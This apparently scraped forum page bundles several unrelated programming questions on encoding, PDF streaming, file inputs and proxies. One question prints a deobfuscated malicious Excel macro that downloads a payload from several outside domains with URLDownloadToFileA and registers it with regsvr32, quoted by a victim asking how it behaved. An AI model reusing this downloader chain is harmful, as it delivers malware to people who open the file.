Twitter Widget behind proxy

I'm trying to use the Twitter widget on a site whose server is inside my corporation's network, and hence behind its proxy.
I can't use the code they provide directly, since the server can't reach the source address:
<script charset="utf-8" src="http://widgets.twimg.com/j/2/widget.js"></script>
I was wondering if I could make a local copy of the JS to avoid this problem, but when I did so I got:
ActionView::WrongEncodingError in Home#index
Your template was not saved as valid UTF-8. Please either specify UTF-8 as the encoding for your template in your text editor, or mark the template with its encoding by inserting the following as the first line of the template:
# encoding: <name of correct encoding>.
But the encoding is already set.
I'm really new to this stuff.
Please help.

The error you get is because Ruby needs an explicit encoding to correctly parse a file that isn't Latin-1.
Each Ruby file that contains UTF-8 characters needs a first line like this example:
# encoding: UTF-8
As for the main problem in your question, you can try serving a local copy, but communication with Twitter is probably blocked as well.
You should talk to your system administrator about getting your app access to Twitter.

Related

caret ^ is being converted to some special symbol

I'm transferring a file with the content shown below from a mainframe system to a Unix instance. The file uses ^&* as a delimiter. The delimiter is correct when I send it from the mainframe, but when we receive the file on Unix, it arrives as Ø&*.
I'm using Connect:Direct to transfer the file from one system to the other.
File type: flat file. File transfer: CD (Connect:Direct).
file content
H^&*20220407^&*160009^&*2006
T^&*1
But when I receive the file on the Unix server, I can see the file content has changed: mainly, ^ has been converted to Ø.
HØ&*20220407Ø&*160009Ø&*2006
TØ&*1
This is almost surely a code page problem.
The data in the file on the mainframe is (most probably) in some EBCDIC code page. Connect:Direct is doing a code page transformation when sending the file to that UNIX system. This is what XLATE(YES) means.
However, some default "from"/"to" code page pair is configured, and that pair is what XLATE(YES) is using. It is probably not the correct pair. You need to:
find out which EBCDIC code page the data on the mainframe is encoded in. Is it IBM-037, IBM-1047, IBM-500, IBM-273, etc.? There are many.
find out which code page the data should be in on the UNIX side: UTF-8, ISO8859-1, 437, etc. There are many.
make sure Connect:Direct transforms using the correct source and target code pages.
Ask your Connect:Direct support people to help you with this.
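
To make the mismatch concrete, here is a minimal sketch. It is illustrative only: the lookup tables contain just a handful of byte values from the published IBM-037 and IBM-1047 tables, not a real conversion library. A national EBCDIC variant (for example Danish/Norwegian), which places letters like Ø where other variants have special characters, is the likely source of the Ø you are seeing.

// Partial, illustrative EBCDIC decode tables. The same byte 0x5F is '^'
// in IBM-1047 but '¬' in IBM-037: one byte, two code pages, two characters.
const CP1047_PARTIAL = { 0xe3: "T", 0x5f: "^", 0x50: "&", 0x5c: "*", 0xf1: "1" };
const CP037_PARTIAL = { 0xe3: "T", 0x5f: "¬", 0x50: "&", 0x5c: "*", 0xf1: "1" };

function decodeWith(table, bytes) {
  return Array.from(bytes, (b) => table[b] ?? "?").join("");
}

// The record "T^&*1" as IBM-1047 bytes:
const record = Buffer.from([0xe3, 0x5f, 0x50, 0x5c, 0xf1]);

console.log(decodeWith(CP1047_PARTIAL, record)); // "T^&*1" (correct pair)
console.log(decodeWith(CP037_PARTIAL, record)); // "T¬&*1" (wrong pair garbles the delimiter)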

urlmon / URLDownloadToFil - Skipped downloads

To cut a long story short, I got duped: I opened a malicious Excel file and ran the macro.
The payload was highly obfuscated, but after digging through the guts of the Excel file I managed to piece it together:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
Note: actual full URLs above redacted to avoid accidental exposure by anyone reading this.
When accessed, the malicious URLs contain the following contents:
onlinebrandedcontent: Standard Apache file index page with no contents
onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or JavaScript.
marcoantonioguerrerafitness / acceptanceh / gloselweb: Triggers download of a (presumably malicious) DLL file
It appears the code above only got as far as the onlyfansgo URL (enu.ocx on my machine contains the harmless "Account Suspended" HTML markup, with a reference to webmaster#onlyfansgo.com), so it looks like I dodged a bullet (regsvr32.exe would have attempted to register an HTML file and failed).
My question: why did the payload pull the onlyfansgo URL response but stop there? If it was willing to accept an HTML file as a successful download, why did it not stop at onlinebrandedcontent? Is it something to do with the fact that onlyfansgo is the only HTTPS URL in the list?

Streaming pdf file from node server randomly just shows binary data on browser

I have a node app (specifically a Sails app) that serves a PDF file. My code for serving the file looks like this:
request.get(pdfUrl).pipe(res)
When I view the URL for the PDF, it usually renders fine. But sometimes it just renders the binary data of the PDF in the browser, like this:
%PDF-1.4 1 0 obj << /Title (��) /Creator (��wkhtmltopdf
I am not able to figure out why it randomly fails to serve the PDF correctly. Is it a Chrome thing, or am I missing something?
Leaving this here in the hope that it helps somebody. I have had similar issues multiple times, and it's usually one of these things:
1. You're using an HTTP connection for an HTTPS delivery (this is typical with websockets, where you must specify :443 in addition to the wss scheme).
2. request's encoding parameter is decoding the body to text instead of leaving it as raw bytes. The fix is to set encoding to null, as follows: request({url: myUrl, encoding: null}).
3. Content types in headers: steering clear of this one, since it's obvious and others have covered it substantially enough already :)
I am pretty sure you're facing this due to (2). Have a look at https://github.com/request/request
encoding - Encoding to be used on setEncoding of response data. If null, the body is returned as a Buffer. Anything else (including the default value of undefined) will be passed as the encoding parameter to toString() (meaning this is effectively utf8 by default). (Note: if you expect binary data, you should set encoding: null.)
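
As a concrete sketch of both fixes (assuming the now-deprecated request library from the question; pdfUrl stands in for the URL from the original code, and the error handling here is illustrative):

const request = require('request');

const pdfUrl = 'http://example.com/sample.pdf'; // placeholder for the question's URL

// Streaming: pipe() forwards raw bytes, so the important part is telling
// the browser what it is receiving before the stream starts.
function servePdf(req, res) {
  res.setHeader('Content-Type', 'application/pdf');
  request
    .get(pdfUrl)
    .on('error', () => res.sendStatus(502))
    .pipe(res);
}

// Buffering: encoding: null is what keeps the body a Buffer instead of a
// utf8-decoded string, so the PDF bytes survive intact.
request({ url: pdfUrl, encoding: null }, (err, response, body) => {
  if (err) throw err;
  // body is a Buffer here
});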
Since the aforementioned suggestions didn't work for you, I would like to see forensics on the following:
Are the files that fail over a particular size? Is this a buffer issue at some level?
Does the presence of a certain character in the file cause this, because it breaks some of your script?
Are the metadata sections and file endings the same across a failed and a successful file? How a media file is signed up top, and how it's truncated down bottom, can greatly impact how it is interpreted.
You may need to include the Content-Type header application/pdf in the node response to tell the recipient that what it's receiving is a PDF. Some browsers are smart enough to determine the content type from the data stream, but you can't assume that's always the case.
When Chrome renders the PDF as text, I would check the very end of the file. A PDF file contains an obligatory xref table and trailer at the end, so every valid PDF file should end with the sequence %%EOF. If yours doesn't, the request was interrupted or something went wrong.
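
A quick way to check the tail of a suspect download (a sketch; the filename is illustrative):

const fs = require('fs');

// Read the last few bytes and look for the PDF end-of-file marker.
const tail = fs.readFileSync('downloaded.pdf').slice(-32).toString('latin1');
console.log(tail.includes('%%EOF') ? 'tail looks complete' : 'file looks truncated');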
You also need the HTTP headers:
Content-Disposition: inline; filename=sample.pdf
and
Content-Length: 200
Did you try saving whatever binary output you get to disk and opening it manually in a PDF reader? It could be corrupt.
I would suggest trying both of these:
Content-Type: application/pdf
Content-Disposition: attachment; filename="somefilename.pdf"
(or control the MIME type in other ways: https://www.npmjs.com/package/mime-types)
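
In an Express-style response (which Sails uses under the hood), that looks roughly like this (a sketch; the filename is illustrative):

// Set both headers on the response before sending or streaming the PDF bytes.
function setPdfHeaders(res) {
  res.set({
    'Content-Type': 'application/pdf',
    'Content-Disposition': 'attachment; filename="somefilename.pdf"',
  });
}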

Uploading file, getting fakepath

I am trying to upload a video to YouTube through their API.
I use an HTML input field, but for some reason it gives me a path like
C:\fakepath\..
Why is this, and how can I get the right file path so I can use it in my request?
<input type="file" name="fileName" data-schema-key="fileName">
This question has already been answered here: How to resolve the C:\fakepath?.
As commented in The Mystery of c:fakepath Unveiled:
According to the specifications of HTML5, a file upload control should not reveal the real local path of the file you have selected if you manipulate its value string with JavaScript. Instead, the string returned by the script that handles the file information is C:\fakepath.
If you want to keep just the filename (for "beauty" purposes), you can do a simple string replacement:
// Change the input's value by removing the fake path
fileInput.value = fileInput.value.replace("C:\\fakepath\\", "");
You can't, however, have access to the original file path. "It makes sense - as a client, you don't want the server to know your local machine's filesystem. It would be nice if all browsers did this", as already pointed out in the SO question I cited in the first line of this answer.
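
For the actual upload, the real path isn't needed anyway: the browser exposes the file's contents through the File API, and that is what an upload request uses. A minimal sketch (the /upload endpoint is a placeholder, not YouTube's actual API):

const fileInput = document.querySelector('input[name="fileName"]');

fileInput.addEventListener('change', () => {
  const file = fileInput.files[0]; // a File object: name, size, and contents
  const formData = new FormData();
  formData.append('video', file);
  // Send the bytes themselves; no local filesystem path is required.
  fetch('/upload', { method: 'POST', body: formData });
});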

Wrong text encoding when parsing json data

I am curling a website and writing the response to a .json file; this file is the input to my Java code, which parses it using a JSON library, and the necessary data is written back to a CSV file that I later store in a database.
Since data coming from a website can be in different formats, I make sure that I read and write in UTF-8, but I still get wrong output.
For example, Østerriksk becomes �sterriksk.
I am doing all this on Linux. I think there is an encoding problem, because the same code runs fine on Windows but not on Unix/Linux.
I am quite sure my Java code is correct, but I am not able to find out what I'm doing wrong.
You're reading the data as ISO 8859-1, but the file is actually UTF-8. There's an argument (or setting) on the file reader that should solve that: pass the charset explicitly when constructing the reader (in Java, for example, an InputStreamReader built with StandardCharsets.UTF_8) instead of relying on the platform default, which is what differs between Windows and Linux.
Also: curl isn't going to care about the encodings; it writes the bytes exactly as it receives them. It's really something in your Java code that's wrong.
Which IDE are you using? This can happen, for example, in Eclipse if you haven't set the default encoding to UTF-8 in the project properties.
